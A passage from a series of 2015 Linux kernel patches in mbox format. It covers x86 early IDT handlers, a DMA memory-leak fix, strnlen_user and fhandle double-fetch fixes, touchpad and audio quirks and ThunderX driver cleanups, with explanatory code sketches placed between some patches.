what's going on, and the code only works in the first place because GAS never generates two-byte JMP instructions when jumping to global labels. Clean up the code to generate the correct array stride (member size) explicitly. This should be considerably more robust against screw-ups, as GAS will warn if a .fill directive has a negative count. Using '. =' to advance would have been even more robust (it would generate an actual error if it tried to move backwards), but it would pad with nulls, confusing anyone who tries to disassemble the code. The new scheme should be much clearer to future readers. 
While we're at it, improve the comments and rename the array and common code. Binutils may start relaxing jumps to non-weak labels. If so, this change will fix our build, and we may need to backport this change. Before, on x86_64: 0000000000000000 : 0: 6a 00 pushq $0x0 2: 6a 00 pushq $0x0 4: e9 00 00 00 00 jmpq 9 5: R_X86_64_PC32 early_idt_handler-0x4 ... 48: 66 90 xchg %ax,%ax 4a: 6a 08 pushq $0x8 4c: e9 00 00 00 00 jmpq 51 4d: R_X86_64_PC32 early_idt_handler-0x4 ... 117: 6a 00 pushq $0x0 119: 6a 1f pushq $0x1f 11b: e9 00 00 00 00 jmpq 120 11c: R_X86_64_PC32 early_idt_handler-0x4 After: 0000000000000000 : 0: 6a 00 pushq $0x0 2: 6a 00 pushq $0x0 4: e9 14 01 00 00 jmpq 11d ... 48: 6a 08 pushq $0x8 4a: e9 d1 00 00 00 jmpq 120 4f: cc int3 50: cc int3 ... 117: 6a 00 pushq $0x0 119: 6a 1f pushq $0x1f 11b: eb 03 jmp 120 11d: cc int3 11e: cc int3 11f: cc int3 Signed-off-by: Andy Lutomirski Acked-by: H. Peter Anvin Cc: Binutils Cc: Borislav Petkov Cc: H.J. Lu Cc: Jan Beulich Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: Link: http://lkml.kernel.org/r/ac027962af343b0c599cbfcf50b945ad2ef3d7a8.1432336324.git.luto@kernel.org Signed-off-by: Ingo Molnar --- arch/x86/include/asm/segment.h | 14 ++++++++++++-- arch/x86/kernel/head64.c | 2 +- arch/x86/kernel/head_32.S | 33 ++++++++++++++++++--------------- arch/x86/kernel/head_64.S | 20 +++++++++++--------- 4 files changed, 42 insertions(+), 27 deletions(-) diff --git a/arch/x86/include/asm/segment.h b/arch/x86/include/asm/segment.h index 5a9856eb12ba..7d5a1929d76b 100644 --- a/arch/x86/include/asm/segment.h +++ b/arch/x86/include/asm/segment.h @@ -231,11 +231,21 @@ #define TLS_SIZE (GDT_ENTRY_TLS_ENTRIES* 8) #ifdef __KERNEL__ + +/* + * early_idt_handler_array is an array of entry points referenced in the + * early IDT. For simplicity, it's a real array with one entry point + * every nine bytes. That leaves room for an optional 'push $0' if the + * vector has no error code (two bytes), a 'push $vector_number' (two + * bytes), and a jump to the common entry code (up to five bytes). + */ +#define EARLY_IDT_HANDLER_SIZE 9 + #ifndef __ASSEMBLY__ -extern const char early_idt_handlers[NUM_EXCEPTION_VECTORS][2+2+5]; +extern const char early_idt_handler_array[NUM_EXCEPTION_VECTORS][EARLY_IDT_HANDLER_SIZE]; #ifdef CONFIG_TRACING -# define trace_early_idt_handlers early_idt_handlers +# define trace_early_idt_handler_array early_idt_handler_array #endif /* diff --git a/arch/x86/kernel/head64.c b/arch/x86/kernel/head64.c index 2b55ee6db053..5a4668136e98 100644 --- a/arch/x86/kernel/head64.c +++ b/arch/x86/kernel/head64.c @@ -167,7 +167,7 @@ asmlinkage __visible void __init x86_64_start_kernel(char * real_mode_data) clear_bss(); for (i = 0; i < NUM_EXCEPTION_VECTORS; i++) - set_intr_gate(i, early_idt_handlers[i]); + set_intr_gate(i, early_idt_handler_array[i]); load_idt((const struct desc_ptr *)&idt_descr); copy_bootdata(__va(real_mode_data)); diff --git a/arch/x86/kernel/head_32.S b/arch/x86/kernel/head_32.S index d031bad9e07e..53eeb226657c 100644 --- a/arch/x86/kernel/head_32.S +++ b/arch/x86/kernel/head_32.S @@ -478,21 +478,22 @@ is486: __INIT setup_once: /* - * Set up a idt with 256 entries pointing to ignore_int, - * interrupt gates. It doesn't actually load idt - that needs - * to be done on each CPU. Interrupts are enabled elsewhere, - * when we can be relatively sure everything is ok. + * Set up a idt with 256 interrupt gates that push zero if there + * is no error code and then jump to early_idt_handler_common. 
+ * It doesn't actually load the idt - that needs to be done on + * each CPU. Interrupts are enabled elsewhere, when we can be + * relatively sure everything is ok. */ movl $idt_table,%edi - movl $early_idt_handlers,%eax + movl $early_idt_handler_array,%eax movl $NUM_EXCEPTION_VECTORS,%ecx 1: movl %eax,(%edi) movl %eax,4(%edi) /* interrupt gate, dpl=0, present */ movl $(0x8E000000 + __KERNEL_CS),2(%edi) - addl $9,%eax + addl $EARLY_IDT_HANDLER_SIZE,%eax addl $8,%edi loop 1b @@ -524,26 +525,28 @@ setup_once: andl $0,setup_once_ref /* Once is enough, thanks */ ret -ENTRY(early_idt_handlers) +ENTRY(early_idt_handler_array) # 36(%esp) %eflags # 32(%esp) %cs # 28(%esp) %eip # 24(%rsp) error code i = 0 .rept NUM_EXCEPTION_VECTORS - .if (EXCEPTION_ERRCODE_MASK >> i) & 1 - ASM_NOP2 - .else + .ifeq (EXCEPTION_ERRCODE_MASK >> i) & 1 pushl $0 # Dummy error code, to make stack frame uniform .endif pushl $i # 20(%esp) Vector number - jmp early_idt_handler + jmp early_idt_handler_common i = i + 1 + .fill early_idt_handler_array + i*EARLY_IDT_HANDLER_SIZE - ., 1, 0xcc .endr -ENDPROC(early_idt_handlers) +ENDPROC(early_idt_handler_array) - /* This is global to keep gas from relaxing the jumps */ -ENTRY(early_idt_handler) +early_idt_handler_common: + /* + * The stack is the hardware frame, an error code or zero, and the + * vector number. + */ cld cmpl $2,(%esp) # X86_TRAP_NMI @@ -603,7 +606,7 @@ ex_entry: is_nmi: addl $8,%esp /* drop vector number and error code */ iret -ENDPROC(early_idt_handler) +ENDPROC(early_idt_handler_common) /* This is the default interrupt "handler" :-) */ ALIGN diff --git a/arch/x86/kernel/head_64.S b/arch/x86/kernel/head_64.S index ae6588b301c2..df7e78057ae0 100644 --- a/arch/x86/kernel/head_64.S +++ b/arch/x86/kernel/head_64.S @@ -321,26 +321,28 @@ bad_address: jmp bad_address __INIT - .globl early_idt_handlers -early_idt_handlers: +ENTRY(early_idt_handler_array) # 104(%rsp) %rflags # 96(%rsp) %cs # 88(%rsp) %rip # 80(%rsp) error code i = 0 .rept NUM_EXCEPTION_VECTORS - .if (EXCEPTION_ERRCODE_MASK >> i) & 1 - ASM_NOP2 - .else + .ifeq (EXCEPTION_ERRCODE_MASK >> i) & 1 pushq $0 # Dummy error code, to make stack frame uniform .endif pushq $i # 72(%rsp) Vector number - jmp early_idt_handler + jmp early_idt_handler_common i = i + 1 + .fill early_idt_handler_array + i*EARLY_IDT_HANDLER_SIZE - ., 1, 0xcc .endr +ENDPROC(early_idt_handler_array) -/* This is global to keep gas from relaxing the jumps */ -ENTRY(early_idt_handler) +early_idt_handler_common: + /* + * The stack is the hardware frame, an error code or zero, and the + * vector number. + */ cld cmpl $2,(%rsp) # X86_TRAP_NMI @@ -412,7 +414,7 @@ ENTRY(early_idt_handler) is_nmi: addq $16,%rsp # drop vector number and error code INTERRUPT_RETURN -ENDPROC(early_idt_handler) +ENDPROC(early_idt_handler_common) __INITDATA From 429770823d961187c39df490d49683c467b10065 Mon Sep 17 00:00:00 2001 From: Peter Ujfalusi Date: Tue, 26 May 2015 13:11:28 +0300 Subject: [PATCH 583/872] dmaengine: hsu: Fix memory leak when stopping a running transfer The vd->node is removed from the lists when the transfer started so the vchan_get_all_descriptors() will not find it. This results memory leak. 
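The hunk below only shows the changed lines; for context, the complete termination path in a virt-dma based driver has roughly the shape sketched here. The foo_* names and structures are placeholders for illustration (the real code is the hsu driver in the diff that follows), and the sketch relies on the helpers from drivers/dma/virt-dma.h:

struct foo_dma_desc {
        struct virt_dma_desc vdesc;
        /* ... hardware descriptor state ... */
};

struct foo_dma_chan {
        struct virt_dma_chan vchan;
        struct foo_dma_desc *desc;      /* descriptor currently on the hardware */
};

static struct foo_dma_chan *to_foo_dma_chan(struct dma_chan *chan)
{
        return container_of(chan, struct foo_dma_chan, vchan.chan);
}

static int foo_dma_terminate_all(struct dma_chan *chan)
{
        struct foo_dma_chan *fooc = to_foo_dma_chan(chan);
        unsigned long flags;
        LIST_HEAD(head);

        spin_lock_irqsave(&fooc->vchan.lock, flags);
        foo_dma_stop_channel(fooc);     /* placeholder for the driver's HW stop */
        if (fooc->desc) {
                /*
                 * The in-flight descriptor was removed from the vchan lists
                 * when it was started, so vchan_get_all_descriptors() below
                 * can never return it; free it here explicitly or it leaks.
                 */
                foo_dma_desc_free(&fooc->desc->vdesc);  /* driver's own free */
                fooc->desc = NULL;
        }
        vchan_get_all_descriptors(&fooc->vchan, &head); /* queued descriptors only */
        spin_unlock_irqrestore(&fooc->vchan.lock, flags);

        vchan_dma_desc_free_list(&fooc->vchan, &head);
        return 0;
}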
Signed-off-by: Peter Ujfalusi [andy: fix the typo to prevent a compilation error] Signed-off-by: Andy Shevchenko Signed-off-by: Vinod Koul --- drivers/dma/hsu/hsu.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/dma/hsu/hsu.c b/drivers/dma/hsu/hsu.c index 9b84def7a353..f42f71e37e73 100644 --- a/drivers/dma/hsu/hsu.c +++ b/drivers/dma/hsu/hsu.c @@ -384,7 +384,10 @@ static int hsu_dma_terminate_all(struct dma_chan *chan) spin_lock_irqsave(&hsuc->vchan.lock, flags); hsu_dma_stop_channel(hsuc); - hsuc->desc = NULL; + if (hsuc->desc) { + hsu_dma_desc_free(&hsuc->desc->vdesc); + hsuc->desc = NULL; + } vchan_get_all_descriptors(&hsuc->vchan, &head); spin_unlock_irqrestore(&hsuc->vchan.lock, flags); From a26484bb7e77d474ecef1ef01ce37fb16fb84f60 Mon Sep 17 00:00:00 2001 From: Alban Bedel Date: Sun, 19 Apr 2015 14:30:01 +0200 Subject: [PATCH 584/872] MIPS: ath79: Add a missing new line in log message The memory setup log is missing a new line. Signed-off-by: Alban Bedel Cc: linux-mips@linux-mips.org Cc: Andrew Bresticker Cc: Qais Yousef Cc: Wolfram Sang Cc: Sergey Ryazanov Cc: Gabor Juhos Cc: linux-kernel@vger.kernel.org Patchwork: https://patchwork.linux-mips.org/patch/9771/ Signed-off-by: Ralf Baechle --- arch/mips/ath79/setup.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/ath79/setup.c b/arch/mips/ath79/setup.c index a73c93c3d44a..7fc8397d16f2 100644 --- a/arch/mips/ath79/setup.c +++ b/arch/mips/ath79/setup.c @@ -225,7 +225,7 @@ void __init plat_time_init(void) ddr_clk_rate = ath79_get_sys_clk_rate("ddr"); ref_clk_rate = ath79_get_sys_clk_rate("ref"); - pr_info("Clocks: CPU:%lu.%03luMHz, DDR:%lu.%03luMHz, AHB:%lu.%03luMHz, Ref:%lu.%03luMHz", + pr_info("Clocks: CPU:%lu.%03luMHz, DDR:%lu.%03luMHz, AHB:%lu.%03luMHz, Ref:%lu.%03luMHz\n", cpu_clk_rate / 1000000, (cpu_clk_rate / 1000) % 1000, ddr_clk_rate / 1000000, (ddr_clk_rate / 1000) % 1000, ahb_clk_rate / 1000000, (ahb_clk_rate / 1000) % 1000, From 5eda7861e347ffe927ecde5abd74d7b13ae938fa Mon Sep 17 00:00:00 2001 From: Rusty Russell Date: Mon, 1 Jun 2015 15:53:53 +0930 Subject: [PATCH 585/872] ia64: make cpu_callin_map non-volatile. cpumask_test_cpu() doesn't take volatile, unlike the obsoleted cpu_isset. The only place ia64 really cares is the spin waiting for a bit; udelay() is probably a barrier but insert barrier() to be sure. 
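The role of barrier() is easiest to see in a minimal polling loop. The sketch below is not the ia64 code; wait_for_flag() and its flag are made-up names. Without the volatile qualifier on the cpumask, nothing forces the compiler to reload the flag on every iteration, so it could legally hoist the load out of the loop and spin on a stale register value; udelay() may happen to act as a compiler barrier, but barrier() makes the re-read explicit and guaranteed.

#include <linux/bitops.h>
#include <linux/compiler.h>
#include <linux/delay.h>
#include <linux/errno.h>

/* Sketch only: spin until another CPU sets bit 0 of *flag. */
static int wait_for_flag(unsigned long *flag)
{
        int timeout;

        for (timeout = 0; timeout < 100000; timeout++) {
                if (test_bit(0, flag))
                        return 0;       /* the other CPU has checked in */
                barrier();              /* force *flag to be re-read */
                udelay(100);
        }
        return -ETIMEDOUT;
}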
Signed-off-by: Rusty Russell Signed-off-by: Tony Luck --- arch/ia64/kernel/smpboot.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/arch/ia64/kernel/smpboot.c b/arch/ia64/kernel/smpboot.c index 15051e9c2c6f..b054c5c6e713 100644 --- a/arch/ia64/kernel/smpboot.c +++ b/arch/ia64/kernel/smpboot.c @@ -127,7 +127,7 @@ int smp_num_siblings = 1; volatile int ia64_cpu_to_sapicid[NR_CPUS]; EXPORT_SYMBOL(ia64_cpu_to_sapicid); -static volatile cpumask_t cpu_callin_map; +static cpumask_t cpu_callin_map; struct smp_boot_data smp_boot_data __initdata; @@ -477,6 +477,7 @@ do_boot_cpu (int sapicid, int cpu, struct task_struct *idle) for (timeout = 0; timeout < 100000; timeout++) { if (cpumask_test_cpu(cpu, &cpu_callin_map)) break; /* It has booted */ + barrier(); /* Make sure we re-read cpu_callin_map */ udelay(100); } Dprintk("\n"); From f18c34e483ff6b1d9866472221e4015b3a4698e4 Mon Sep 17 00:00:00 2001 From: Jan Kara Date: Tue, 2 Jun 2015 17:10:28 +0200 Subject: [PATCH 586/872] lib: Fix strnlen_user() to not touch memory after specified maximum If the specified maximum length of the string is a multiple of unsigned long, we would load one long behind the specified maximum. If that happens to be in a next page, we can hit a page fault although we were not expected to. Fix the off-by-one bug in the test whether we are at the end of the specified range. Signed-off-by: Jan Kara Cc: stable@vger.kernel.org Signed-off-by: Linus Torvalds --- lib/strnlen_user.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/strnlen_user.c b/lib/strnlen_user.c index a28df5206d95..11649615c505 100644 --- a/lib/strnlen_user.c +++ b/lib/strnlen_user.c @@ -57,7 +57,8 @@ static inline long do_strnlen_user(const char __user *src, unsigned long count, return res + find_zero(data) + 1 - align; } res += sizeof(unsigned long); - if (unlikely(max < sizeof(unsigned long))) + /* We already handled 'unsigned long' bytes. Did we do it all ? */ + if (unlikely(max <= sizeof(unsigned long))) break; max -= sizeof(unsigned long); if (unlikely(__get_user(c,(unsigned long __user *)(src+res)))) From 161f873b89136eb1e69477c847d5a5033239d9ba Mon Sep 17 00:00:00 2001 From: Sasha Levin Date: Wed, 28 Jan 2015 15:30:43 -0500 Subject: [PATCH 587/872] vfs: read file_handle only once in handle_to_path We used to read file_handle twice. Once to get the amount of extra bytes, and once to fetch the entire structure. This may be problematic since we do size verifications only after the first read, so if the number of extra bytes changes in userspace between the first and second calls, we'll have an incoherent view of file_handle. Instead, read the constant size once, and copy that over to the final structure without having to re-read it again. 
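The change applies the usual defence against user-space double fetches. A generic sketch of the idiom follows (struct blob_hdr, MAX_PAYLOAD and fetch_blob() are invented names, not the fhandle code): copy the fixed-size header exactly once, validate it, and from then on trust only the kernel copy, fetching just the variable-length tail in the second copy_from_user().

#include <linux/errno.h>
#include <linux/slab.h>
#include <linux/types.h>
#include <linux/uaccess.h>

struct blob_hdr {
        u32 nbytes;             /* length of the variable-sized part */
};

#define MAX_PAYLOAD 128

static int fetch_blob(const void __user *uptr, struct blob_hdr **out)
{
        struct blob_hdr hdr, *blob;

        if (copy_from_user(&hdr, uptr, sizeof(hdr)))
                return -EFAULT;
        if (hdr.nbytes > MAX_PAYLOAD)
                return -EINVAL;

        blob = kmalloc(sizeof(hdr) + hdr.nbytes, GFP_KERNEL);
        if (!blob)
                return -ENOMEM;

        *blob = hdr;    /* reuse the header validated above; never re-read it */
        if (copy_from_user(blob + 1, (const u8 __user *)uptr + sizeof(hdr),
                           hdr.nbytes)) {
                kfree(blob);
                return -EFAULT;
        }

        *out = blob;
        return 0;
}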
Signed-off-by: Sasha Levin Cc: Al Viro Cc: stable@vger.kernel.org Signed-off-by: Linus Torvalds --- fs/fhandle.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/fs/fhandle.c b/fs/fhandle.c index 999ff5c3cab0..d59712dfa3e7 100644 --- a/fs/fhandle.c +++ b/fs/fhandle.c @@ -195,8 +195,9 @@ static int handle_to_path(int mountdirfd, struct file_handle __user *ufh, goto out_err; } /* copy the full handle */ - if (copy_from_user(handle, ufh, - sizeof(struct file_handle) + + *handle = f_handle; + if (copy_from_user(&handle->f_handle, + &ufh->f_handle, f_handle.handle_bytes)) { retval = -EFAULT; goto out_handle; From 5f0ee9d17aae628b22be86966471db65be21f262 Mon Sep 17 00:00:00 2001 From: Hans de Goede Date: Tue, 2 Jun 2015 10:40:50 -0700 Subject: [PATCH 588/872] Input: elantech - fix detection of touchpads where the revision matches a known rate MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Make the check to skip the rate check more lax, so that it applies to all hw_version 4 models. This fixes the touchpad not being detected properly on Asus PU551LA laptops. Cc: stable@vger.kernel.org Reported-and-tested-by: David Zafra Gómez Signed-off-by: Hans de Goede Signed-off-by: Dmitry Torokhov --- drivers/input/mouse/elantech.c | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/drivers/input/mouse/elantech.c b/drivers/input/mouse/elantech.c index 79363b687195..f181d73d9629 100644 --- a/drivers/input/mouse/elantech.c +++ b/drivers/input/mouse/elantech.c @@ -1376,10 +1376,11 @@ static bool elantech_is_signature_valid(const unsigned char *param) return true; /* - * Some models have a revision higher then 20. Meaning param[2] may - * be 10 or 20, skip the rates check for these. + * Some hw_version >= 4 models have a revision higher then 20. Meaning + * that param[2] may be 10 or 20, skip the rates check for these. */ - if (param[0] == 0x46 && (param[1] & 0xef) == 0x0f && param[2] < 40) + if ((param[0] & 0x0f) >= 0x06 && (param[1] & 0xaf) == 0x0f && + param[2] < 40) return true; for (i = 0; i < ARRAY_SIZE(rates); i++) From b5d724b1add6eabf3aa7276ab3454ea9f45eebd3 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Tue, 2 Jun 2015 19:57:08 +0200 Subject: [PATCH 589/872] ALSA: hda/realtek - Add a fixup for another Acer Aspire 9420 Acer Aspire 9420 with ALC883 (1025:0107) needs the fixup for EAPD to make the sound working like other Aspire models. 
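For context, a sketch of how such an entry takes effect (the call site below is illustrative and not part of this patch; my_fixup_tbl is a made-up name): the quirk table is matched against the codec's PCI subsystem vendor/device ID at probe time, so the single table line added here is enough to route 1025:0107 to the existing EAPD fixup.

/* Illustrative quirk table and lookup. */
static const struct snd_pci_quirk my_fixup_tbl[] = {
        /* subsystem vendor 0x1025 (Acer), device 0x0107 -> EAPD fixup */
        SND_PCI_QUIRK(0x1025, 0x0107, "Acer Aspire", ALC883_FIXUP_ACER_EAPD),
        {}
};

/* At codec probe time (sketch of the usual sequence): */
snd_hda_pick_fixup(codec, NULL, my_fixup_tbl, alc882_fixups);
snd_hda_apply_fixup(codec, HDA_FIXUP_ACT_PRE_PROBE);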
Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=94111 Cc: Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index 80be33ce1a9e..0320cb523d9e 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -2168,6 +2168,7 @@ static const struct hda_fixup alc882_fixups[] = { static const struct snd_pci_quirk alc882_fixup_tbl[] = { SND_PCI_QUIRK(0x1025, 0x006c, "Acer Aspire 9810", ALC883_FIXUP_ACER_EAPD), SND_PCI_QUIRK(0x1025, 0x0090, "Acer Aspire", ALC883_FIXUP_ACER_EAPD), + SND_PCI_QUIRK(0x1025, 0x0107, "Acer Aspire", ALC883_FIXUP_ACER_EAPD), SND_PCI_QUIRK(0x1025, 0x010a, "Acer Ferrari 5000", ALC883_FIXUP_ACER_EAPD), SND_PCI_QUIRK(0x1025, 0x0110, "Acer Aspire", ALC883_FIXUP_ACER_EAPD), SND_PCI_QUIRK(0x1025, 0x0112, "Acer Aspire 9303", ALC883_FIXUP_ACER_EAPD), From d768b678a8d9c572ad3c2c6ba71d9e7029b867a2 Mon Sep 17 00:00:00 2001 From: Robert Richter Date: Tue, 2 Jun 2015 11:00:18 -0700 Subject: [PATCH 590/872] net: thunderx: Cleanup duplicate NODE_ID macros, add nic_get_node_id() There are duplicate NODE_ID macro definitions. Move all of them to nic.h for usage in nic and bgx driver and introduce nic_get_node_id() helper function. This patch also fixes 64bit mask which should have been ULL by reworking the node calculation. Signed-off-by: Robert Richter Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nic.h | 10 ++++++++++ drivers/net/ethernet/cavium/thunder/nic_main.c | 4 +--- drivers/net/ethernet/cavium/thunder/thunder_bgx.c | 4 ++-- drivers/net/ethernet/cavium/thunder/thunder_bgx.h | 3 --- 4 files changed, 13 insertions(+), 8 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nic.h b/drivers/net/ethernet/cavium/thunder/nic.h index 9b0be527909b..4f426db54e42 100644 --- a/drivers/net/ethernet/cavium/thunder/nic.h +++ b/drivers/net/ethernet/cavium/thunder/nic.h @@ -11,6 +11,7 @@ #include #include +#include #include "thunder_bgx.h" /* PCI device IDs */ @@ -398,6 +399,15 @@ union nic_mbx { struct bgx_link_status link_status; }; +#define NIC_NODE_ID_MASK 0x03 +#define NIC_NODE_ID_SHIFT 44 + +static inline int nic_get_node_id(struct pci_dev *pdev) +{ + u64 addr = pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM); + return ((addr >> NIC_NODE_ID_SHIFT) & NIC_NODE_ID_MASK); +} + int nicvf_set_real_num_queues(struct net_device *netdev, int tx_queues, int rx_queues); int nicvf_open(struct net_device *netdev); diff --git a/drivers/net/ethernet/cavium/thunder/nic_main.c b/drivers/net/ethernet/cavium/thunder/nic_main.c index 0f1f58b54bf1..3ca7ad882c10 100644 --- a/drivers/net/ethernet/cavium/thunder/nic_main.c +++ b/drivers/net/ethernet/cavium/thunder/nic_main.c @@ -23,8 +23,6 @@ struct nicpf { struct pci_dev *pdev; u8 rev_id; -#define NIC_NODE_ID_MASK 0x300000000000 -#define NIC_NODE_ID(x) ((x & NODE_ID_MASK) >> 44) u8 node; unsigned int flags; u8 num_vf_en; /* No of VF enabled */ @@ -851,7 +849,7 @@ static int nic_probe(struct pci_dev *pdev, const struct pci_device_id *ent) pci_read_config_byte(pdev, PCI_REVISION_ID, &nic->rev_id); - nic->node = NIC_NODE_ID(pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM)); + nic->node = nic_get_node_id(pdev); nic_set_lmac_vf_mapping(nic); diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c index 020e11cf3fdd..cde604a93d5d 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c +++ 
b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c @@ -894,8 +894,8 @@ static int bgx_probe(struct pci_dev *pdev, const struct pci_device_id *ent) goto err_release_regions; } bgx->bgx_id = (pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM) >> 24) & 1; - bgx->bgx_id += NODE_ID(pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM)) - * MAX_BGX_PER_CN88XX; + bgx->bgx_id += nic_get_node_id(pdev) * MAX_BGX_PER_CN88XX; + bgx_vnic[bgx->bgx_id] = bgx; bgx_get_qlm_mode(bgx); diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.h b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h index 9d91ce44f8d7..f9e2170c488a 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.h +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h @@ -20,9 +20,6 @@ #define MAX_LMAC (MAX_BGX_PER_CN88XX * MAX_LMAC_PER_BGX) -#define NODE_ID_MASK 0x300000000000 -#define NODE_ID(x) ((x & NODE_ID_MASK) >> 44) - /* Registers */ #define BGX_CMRX_CFG 0x00 #define CMR_PKT_TX_EN BIT_ULL(13) From 4a4f87d8ca2e26c224569405e24282f521af9329 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:19 -0700 Subject: [PATCH 591/872] net: thunderx: fix constants This fixes sparse messages like this: drivers/net/ethernet/cavium/thunder/thunder_bgx.c:897:24: sparse: constant 0x300000000000 is so big it is long Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nicvf_main.c | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_main.c b/drivers/net/ethernet/cavium/thunder/nicvf_main.c index abd446e6155b..f81182caedc2 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_main.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_main.c @@ -326,11 +326,11 @@ static int nicvf_rss_init(struct nicvf *nic) rss->enable = true; /* Using the HW reset value for now */ - rss->key[0] = 0xFEED0BADFEED0BAD; - rss->key[1] = 0xFEED0BADFEED0BAD; - rss->key[2] = 0xFEED0BADFEED0BAD; - rss->key[3] = 0xFEED0BADFEED0BAD; - rss->key[4] = 0xFEED0BADFEED0BAD; + rss->key[0] = 0xFEED0BADFEED0BADULL; + rss->key[1] = 0xFEED0BADFEED0BADULL; + rss->key[2] = 0xFEED0BADFEED0BADULL; + rss->key[3] = 0xFEED0BADFEED0BADULL; + rss->key[4] = 0xFEED0BADFEED0BADULL; nicvf_set_rss_key(nic); From 2cd2a196af20784b9f0a464d0f336de01a074a8c Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:20 -0700 Subject: [PATCH 592/872] net: thunderx: introduce a function for mailbox access This fixes sparse message: drivers/net/ethernet/cavium/thunder/nicvf_main.c:153:25: sparse: cast to restricted __le64 Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. 
Miller --- .../net/ethernet/cavium/thunder/nicvf_main.c | 27 ++++++++++++------- 1 file changed, 17 insertions(+), 10 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_main.c b/drivers/net/ethernet/cavium/thunder/nicvf_main.c index f81182caedc2..989f005be9fd 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_main.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_main.c @@ -110,17 +110,23 @@ u64 nicvf_queue_reg_read(struct nicvf *nic, u64 offset, u64 qidx) /* VF -> PF mailbox communication */ +static void nicvf_write_to_mbx(struct nicvf *nic, union nic_mbx *mbx) +{ + u64 *msg = (u64 *)mbx; + + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 0, msg[0]); + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 8, msg[1]); +} + int nicvf_send_msg_to_pf(struct nicvf *nic, union nic_mbx *mbx) { int timeout = NIC_MBOX_MSG_TIMEOUT; int sleep = 10; - u64 *msg = (u64 *)mbx; nic->pf_acked = false; nic->pf_nacked = false; - nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 0, msg[0]); - nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 8, msg[1]); + nicvf_write_to_mbx(nic, mbx); /* Wait for previous message to be acked, timeout 2sec */ while (!nic->pf_acked) { @@ -146,12 +152,13 @@ int nicvf_send_msg_to_pf(struct nicvf *nic, union nic_mbx *mbx) static int nicvf_check_pf_ready(struct nicvf *nic) { int timeout = 5000, sleep = 20; + union nic_mbx mbx = {}; + + mbx.msg.msg = NIC_MBOX_MSG_READY; nic->pf_ready_to_rcv_msg = false; - nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 0, - le64_to_cpu(NIC_MBOX_MSG_READY)); - nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 8, 1ULL); + nicvf_write_to_mbx(nic, &mbx); while (!nic->pf_ready_to_rcv_msg) { msleep(sleep); @@ -368,7 +375,9 @@ int nicvf_set_real_num_queues(struct net_device *netdev, static int nicvf_init_resources(struct nicvf *nic) { int err; - u64 mbx_addr = NIC_VF_PF_MAILBOX_0_1; + union nic_mbx mbx = {}; + + mbx.msg.msg = NIC_MBOX_MSG_CFG_DONE; /* Enable Qset */ nicvf_qset_config(nic, true); @@ -382,9 +391,7 @@ static int nicvf_init_resources(struct nicvf *nic) } /* Send VF config done msg to PF */ - nicvf_reg_write(nic, mbx_addr, le64_to_cpu(NIC_MBOX_MSG_CFG_DONE)); - mbx_addr += (NIC_PF_VF_MAILBOX_SIZE - 1) * 8; - nicvf_reg_write(nic, mbx_addr, 1ULL); + nicvf_write_to_mbx(nic, &mbx); return 0; } From e610cb32b4205c921e26fc8c7e43af7ae3543148 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:21 -0700 Subject: [PATCH 593/872] net: thunderx: rework mac address handling This fixes sparse message: drivers/net/ethernet/cavium/thunder/nicvf_main.c:385:40: sparse: cast to restricted __le64 Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. 
